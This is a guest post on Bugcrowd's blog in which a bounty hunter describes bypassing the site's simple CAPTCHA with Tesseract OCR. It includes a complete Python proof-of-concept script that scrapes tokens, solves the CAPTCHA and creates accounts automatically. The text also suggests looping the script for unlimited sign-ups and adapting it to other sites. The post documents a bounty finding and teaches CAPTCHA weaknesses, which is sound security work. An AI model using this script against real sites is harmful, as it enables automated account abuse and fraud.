Bugcrowd Blog

Guest Blog: Breaking Bugcrowd's Captcha by Pwndizzle

Posted by Casey Ellis on Dec 4, 2013 10:08:42 PM

Introduction

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic CAPTCHA. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the CAPTCHA to verify you were human.

signup

This in theory would prevent automated use of these functions. But if I could find a way to bypass the CAPTCHA I could potentially abuse these functions.

So how do you bypass a captcha?

If it's a home-grown CAPTCHA you may be lucky enough to find a logic flaw such as the CAPTCHA code being included on the current page or perhaps you can re-use a valid CAPTCHA more than once.

If you're dealing with a more sophisticated CAPTCHA you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).

OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return you a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as it's engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd CAPTCHA was so simple all I needed to do was enlarge the image before submitting to Tesseract for analysis to succeed most of the time. For other more complex CAPTCHA that use distorted characters or overlays to mask the text you will need to clean the image before submitting to Tesseract. Some examples can be found in the references below.

Weaponizing using Python

With a way to obtain the CAPTCHA value, I've decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy that I am, I had a look on Google to see if someone else had already created a similar script and although there were CAPTCHA breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests, one to retrieve the sign-up page (containing captcha and csrf) and a second request to send sign-up data (username, email, password etc.) To automate the whole process the script would need to download a copy of the sign-up page, extract the CSRF and CAPTCHA tokens, download and analyse the CAPTCHA then submit a sign-up request containing the following:

parameters

Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
 # Created by @pwndizzle - <a href="http://pwndizzle.blogspot.com/" target="_blank">http://pwndizzle.blogspot.com</a>

 from PIL import Image
 from urllib.error import *
 from urllib.request import *
 from urllib.parse import *
 import re
 import subprocess

 def getpage():
     try:
         print("[+] Downloading Page");
         site = urlopen("https://portal.<wbr />bugcrowd.com/user/sign_up")
         site_html = site.read().decode("utf-8")
         global csrf
         #Parse page for CSRF token (string 43 characters long ending with =)
         csrf = re.findall('[a-zA-Z0-9+/]{43}=<wbr />', site_html)
         print ("-----CSRF Token: " + csrf[0])
         global ctoken
         #Parse page for captcha token (string 40 characters long)
         ctoken = re.findall('[a-z0-9]{40}', site_html)
         print ("-----Captcha Token: " + ctoken[0])
     except URLError as e:
         print ("*****Error: Cannot retrieve URL*****");

 def getcaptcha():
     try:
         print("[+] Downloading Captcha");
         captchaurl = "https://portal.bugcrowd.com/<wbr />simple_captcha?code="+ctoken[<wbr />0]
         urlretrieve(captchaurl,'<wbr />captcha1.png')
     except URLError as e:
         print ("*****Error: Cannot retrieve URL*****");

 def resizer():
 print("[+] Resizing...");
 im1 = Image.open("captcha1.png")
 width, height = im1.size
 im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
 im2.save("captcha2.png")

 def tesseract():
     try:
         print("[+] Running Tesseract...");
         #Run Tesseract, -psm 8, tells Tesseract we are looking for a single word
         subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\<wbr />tesseract.exe', 'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
         f = open ("C:\Python33\output.txt","r")
         global cvalue
 #Remove whitespace and newlines from Tesseract output
         cvaluelines = f.read().replace(" ", "").split('\n')
         cvalue = cvaluelines[0]
         print("-----Captcha: " + cvalue);
     except Exception as e:
         print ("Error: " + str(e))

 def send():
     try:
         print("[+] Sending request...");
         user = "testuser99"
         params = {'utf8':'%E2%9C%93', 'authenticity_token': csrf[0], 'user[username]':user, 'user[email]':user+'@test.com'<wbr />, 'user[password]':'password123'<wbr />, 'user[password_confirmation]':<wbr />'password123', 'captcha':cvalue,'captcha_key'<wbr />:ctoken[0],'agree_terms_<wbr />conditions':'true'}
         data = urlencode(params).encode('utf-<wbr />8')
         request = Request("https://portal.<wbr />bugcrowd.com/user")
         #Send request and analyse response
         f = urlopen(request, data)
         response = f.read().decode('utf-8')
 #Check for error message
         fail = re.search('The following errors occurred', response)
         if fail:
             print("-----Account creation failed!")
         else:
             print ("-----Account created!")
     except Exception as e:
         print ("Error: " + str(e))

 print("[+] Start!");
 #Download page and parse data
 getpage();
 #Download captcha image
 getcaptcha();
 #Resize captcha image
 resizer();
 #Need more filtering? Add subroutines here!
 #Use Tesseract to analyse captcha image
 tesseract();
 #Send request to site containing form data and captcha
 send();
 print("[+] Finished!");

 

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following CAPTCHA:

captcha

I get the following output:

output

Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

- Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.

- Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha, means a lower success rate, more requests and a greater chance of getting caught/locked out.

- There could be server-side mitigations in place we don't know about. E.g. Each ip cannot create more than five accounts a day.

- The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.

Final Thoughts

The Bugcrowd captcha is a great example of how not to implement a captcha and provided the perfect opportunity to demonstrate how easily weak captchas can be exploited with Python and Tesseract.

Captchas can be awesome if implemented correctly. Letter/number based captchas are just too easy to break and can frustrate users. For me images (people, places, objects) or interactive captchas/mini-games like those offered by http://areyouahuman.com/ appear to be an interesting alternative with improved user experience and security.

If you want to use the script with a different site you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha. You may also need to analyse response data depending on the logic of the site. Depending on your system and where you run the script (I ran it from c:\Python33), file paths in the tesseract() function may need to be modified.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Cleaning catpchas with Imagemagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

I hope you guys have found this post useful. For questions and feedback, head to Twitter or my blog.

Pwndizzle out.

 

Interesting, Guest Blog, Bug Hunter Tips and Tricks
Casey Ellis

Written by Casey Ellis

Founder and CEO of Bugcrowd